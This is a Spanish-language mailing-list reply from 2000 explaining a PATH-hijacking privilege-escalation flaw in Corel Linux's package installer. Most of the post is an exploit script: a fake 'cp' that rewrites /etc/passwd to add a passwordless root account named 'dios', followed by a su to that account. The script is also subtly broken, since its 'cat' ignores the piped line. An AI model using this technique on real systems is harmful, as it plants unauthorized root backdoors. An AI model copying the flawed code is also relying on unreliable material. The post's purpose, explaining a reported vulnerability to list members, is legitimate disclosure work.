[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]On Fri, 14 Jan 2000, ROMEO GUTIERREZ VASQEZ romeogutierrez wrote: > ¿Que es esto? Que el instalador de paquetes .deb de corel linux tiene un serio problema de seguridad: llama al programa "cp" sin darle la ruta completa por lo que si cambiar tu path para que primero busque en un directorio que contenga tu propia versión de "cp" y ya que se ejecuta en contexto de root puedes hacer algo así: [yo@linux yo] export PATH=~yo/bin:$PATH [yo@linux yo] cat ~yo/bin/cp #!/bin/sh # Metodo chafa de hackear echo "dios::0:0:Mi cuenta de Dios:/root:/bin/bash" | \ cat /etc/passwd > ~yo/passwd mv -f ~yo/passwd /etc/passwd # y hacemos lo que debe hacer cp nomás por no dejar :) /bin/cp "$@" [yo@linux yo] /usr/X11R6/bin/get_it [yo@linux yo] su dios - [dios@linux yo] echo Ahora como Dios, todo lo veo... Recuerda que "get_it" es un programa para X. > Por favor en español Si planeas usar linux es recomendable que aprendas inglés (o cuando menos a "traducir" como lo hago yo :) Saludos, Toño. --- mailto: jcgalici en cbbanorte com mx --------------------------------------------------------------------- Lista de soporte de LinuxPPP Reglas de la lista en http://pepe.net.mx/reglas.html